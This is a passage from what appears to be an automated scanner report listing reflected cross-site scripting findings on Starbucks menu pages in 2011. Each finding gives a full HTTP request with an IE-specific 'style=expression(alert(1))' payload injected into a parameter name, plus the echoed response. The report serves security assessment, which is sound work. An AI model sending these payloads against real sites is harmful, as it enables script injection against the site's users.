<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/kids-drinks-and-other/caramel-apple-spice?eb864"style="x:expression(alert(1))"66df403bea2=1"/>
...[SNIP]...

2.175. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/cold-apple-juice [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/kids-drinks-and-other/cold-apple-juice

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 563c7"style%3d"x%3aexpression(alert(1))"b209836fbc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 563c7"style="x:expression(alert(1))"b209836fbc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/kids-drinks-and-other/cold-apple-juice?563c7"style%3d"x%3aexpression(alert(1))"b209836fbc5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:36 GMT
Connection: close
Content-Length: 40523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/kids-drinks-and-other/cold-apple-juice?563c7"style="x:expression(alert(1))"b209836fbc5=1"/>
...[SNIP]...

2.176. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/flavored-steamed-milk [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/kids-drinks-and-other/flavored-steamed-milk

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ee49"style%3d"x%3aexpression(alert(1))"6f89d6acc18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ee49"style="x:expression(alert(1))"6f89d6acc18 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/kids-drinks-and-other/flavored-steamed-milk?5ee49"style%3d"x%3aexpression(alert(1))"6f89d6acc18=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:25 GMT
Connection: close
Content-Length: 41188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/kids-drinks-and-other/flavored-steamed-milk?5ee49"style="x:expression(alert(1))"6f89d6acc18=1"/>
...[SNIP]...

2.177. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/milk [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/kids-drinks-and-other/milk

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28684"style%3d"x%3aexpression(alert(1))"1f8573fecb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 28684"style="x:expression(alert(1))"1f8573fecb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/kids-drinks-and-other/milk?28684"style%3d"x%3aexpression(alert(1))"1f8573fecb9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:11 GMT
Connection: close
Content-Length: 40785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/kids-drinks-and-other/milk?28684"style="x:expression(alert(1))"1f8573fecb9=1"/>
...[SNIP]...

2.178. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/steamed-apple-juice [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/kids-drinks-and-other/steamed-apple-juice

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39769"style%3d"x%3aexpression(alert(1))"720efc59f16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 39769"style="x:expression(alert(1))"720efc59f16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/kids-drinks-and-other/steamed-apple-juice?39769"style%3d"x%3aexpression(alert(1))"720efc59f16=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:10 GMT
Connection: close
Content-Length: 40599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/kids-drinks-and-other/steamed-apple-juice?39769"style="x:expression(alert(1))"720efc59f16=1"/>
...[SNIP]...

2.179. http://www.starbucks.com/menu/drinks/tazo-tea/awake [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/awake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92f97"style%3d"x%3aexpression(alert(1))"47495068b64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 92f97"style="x:expression(alert(1))"47495068b64 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/awake?92f97"style%3d"x%3aexpression(alert(1))"47495068b64=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:01 GMT
Connection: close
Content-Length: 42135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/awake?92f97"style="x:expression(alert(1))"47495068b64=1"/>
...[SNIP]...

2.180. http://www.starbucks.com/menu/drinks/tazo-tea/awake-tea-latte [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/awake-tea-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e510"style%3d"x%3aexpression(alert(1))"35729b21c4d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9e510"style="x:expression(alert(1))"35729b21c4d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/awake-tea-latte?9e510"style%3d"x%3aexpression(alert(1))"35729b21c4d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:00 GMT
Connection: close
Content-Length: 42264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/awake-tea-latte?9e510"style="x:expression(alert(1))"35729b21c4d=1"/>
...[SNIP]...

2.181. http://www.starbucks.com/menu/drinks/tazo-tea/black-shaken-iced-tea [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/black-shaken-iced-tea

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f45fc"style%3d"x%3aexpression(alert(1))"a995444f9d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f45fc"style="x:expression(alert(1))"a995444f9d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/black-shaken-iced-tea?f45fc"style%3d"x%3aexpression(alert(1))"a995444f9d1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:40 GMT
Connection: close
Content-Length: 42142

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/black-shaken-iced-tea?f45fc"style="x:expression(alert(1))"a995444f9d1=1"/>
...[SNIP]...

2.182. http://www.starbucks.com/menu/drinks/tazo-tea/calm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/calm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d301f"style%3d"x%3aexpression(alert(1))"615fe6659bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d301f"style="x:expression(alert(1))"615fe6659bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/calm?d301f"style%3d"x%3aexpression(alert(1))"615fe6659bf=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:24 GMT
Connection: close
Content-Length: 42122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/calm?d301f"style="x:expression(alert(1))"615fe6659bf=1"/>
...[SNIP]...

2.183. http://www.starbucks.com/menu/drinks/tazo-tea/chai-latte [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/chai-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1fa3"style%3d"x%3aexpression(alert(1))"8b53a955b6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1fa3"style="x:expression(alert(1))"8b53a955b6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/chai-latte?d1fa3"style%3d"x%3aexpression(alert(1))"8b53a955b6c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:19 GMT
Connection: close
Content-Length: 42396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/chai-latte?d1fa3"style="x:expression(alert(1))"8b53a955b6c=1"/>
...[SNIP]...

2.184. http://www.starbucks.com/menu/drinks/tazo-tea/china-green-tips [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/china-green-tips

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 122aa"style%3d"x%3aexpression(alert(1))"99a1446dfba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 122aa"style="x:expression(alert(1))"99a1446dfba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/china-green-tips?122aa"style%3d"x%3aexpression(alert(1))"99a1446dfba=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:32 GMT
Connection: close
Content-Length: 42109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/china-green-tips?122aa"style="x:expression(alert(1))"99a1446dfba=1"/>
...[SNIP]...

2.185. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/earl-grey

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a03d"style%3d"x%3aexpression(alert(1))"28dfe317897 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4a03d"style="x:expression(alert(1))"28dfe317897 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/earl-grey?4a03d"style%3d"x%3aexpression(alert(1))"28dfe317897=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:22 GMT
Connection: close
Content-Length: 42144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey?4a03d"style="x:expression(alert(1))"28dfe317897=1"/>
...[SNIP]...

2.186. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey-tea-latte [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/earl-grey-tea-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 949d1"style%3d"x%3aexpression(alert(1))"6eaf867621e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 949d1"style="x:expression(alert(1))"6eaf867621e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/earl-grey-tea-latte?949d1"style%3d"x%3aexpression(alert(1))"6eaf867621e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:35 GMT
Connection: close
Content-Length: 42568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey-tea-latte?949d1"style="x:expression(alert(1))"6eaf867621e=1"/>
...[SNIP]...

2.187. http://www.starbucks.com/menu/drinks/tazo-tea/green-tea-latte [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/green-tea-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8da2d"style%3d"x%3aexpression(alert(1))"8c880f3ec91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8da2d"style="x:expression(alert(1))"8c880f3ec91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/green-tea-latte?8da2d"style%3d"x%3aexpression(alert(1))"8c880f3ec91=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:44 GMT
Connection: close
Content-Length: 42307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/green-tea-latte?8da2d"style="x:expression(alert(1))"8c880f3ec91=1"/>
...[SNIP]...

2.188. http://www.starbucks.com/menu/drinks/tazo-tea/iced-awake-tea-latte [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/iced-awake-tea-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c81c"style%3d"x%3aexpression(alert(1))"7da409656c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9c81c"style="x:expression(alert(1))"7da409656c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/iced-awake-tea-latte?9c81c"style%3d"x%3aexpression(alert(1))"7da409656c1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:33 GMT
Connection: close
Content-Length: 42304

